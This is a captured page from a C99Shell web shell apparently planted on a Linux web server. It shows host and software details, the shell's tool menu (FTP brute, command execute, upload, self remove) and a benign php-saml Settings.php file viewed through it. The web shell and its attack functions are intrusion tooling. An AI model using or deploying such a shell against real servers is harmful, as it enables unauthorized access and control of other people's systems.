!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/vendor/onelogin/php-saml/lib/Saml/   drwxrwxr-x
Free 15.68 GB of 61.93 GB (25.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Settings.php (2.49 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Holds SAML settings for the SamlResponse and SamlAuthRequest classes.
 *
 * These settings need to be filled in by the user prior to being used.
 */
class OneLogin_Saml_Settings
{
    const 
NAMEID_EMAIL_ADDRESS                 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress';
    const 
NAMEID_X509_SUBJECT_NAME             'urn:oasis:names:tc:SAML:1.1:nameid-format:X509SubjectName';
    const 
NAMEID_WINDOWS_DOMAIN_QUALIFIED_NAME 'urn:oasis:names:tc:SAML:1.1:nameid-format:WindowsDomainQualifiedName';
    const 
NAMEID_KERBEROS   'urn:oasis:names:tc:SAML:2.0:nameid-format:kerberos';
    const 
NAMEID_ENTITY     'urn:oasis:names:tc:SAML:2.0:nameid-format:entity';
    const 
NAMEID_TRANSIENT  'urn:oasis:names:tc:SAML:2.0:nameid-format:transient';
    const 
NAMEID_PERSISTENT 'urn:oasis:names:tc:SAML:2.0:nameid-format:persistent';

    
/**
     * The URL to submit SAML authentication requests to.
     * @var string
     */
    
public $idpSingleSignOnUrl '';

    
/**
     * The URL to submit SAML Logout Request to.
     * @var string
     */
    
public $idpSingleLogOutUrl '';

    
/**
     * The x509 certificate used to authenticate the request.
     * @var string
     */
    
public $idpPublicCertificate '';

    
/**
     * The URL where to the SAML Response/SAML Assertion will be posted.
     * @var string
     */
    
public $spReturnUrl '';

    
/**
     * The name of the application.
     * @var string
     */
    
public $spIssuer 'php-saml';

    
/**
     * Specifies what format to return the authentication token, i.e, the email address.
     * @var string
     */
    
public $requestedNameIdFormat self::NAMEID_EMAIL_ADDRESS;

    
/**
     * Return an Array with the values (compatibility with the new version)
     */
    
public function getValues()
    {
        
$values = array();

        
$values['sp'] = array();
        
$values['sp']['entityId'] = $this->spIssuer;
        
$values['sp']['assertionConsumerService'] = array(
            
'url' => $this->spReturnUrl,
        );
        
$values['sp']['NameIDFormat'] = $this->requestedNameIdFormat;

        
$values['idp'] = array();
        
$values['idp']['entityId'] = $this->idpSingleSignOnUrl;
        
$values['idp']['singleSignOnService'] = array(
            
'url' => $this->idpSingleSignOnUrl,
        );
        
$values['idp']['singleLogoutService'] = array(
            
'url' => $this->idpSingleLogOutUrl,
        );
        
$values['idp']['x509cert'] = $this->idpPublicCertificate;

        return 
$values;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.2903 ]--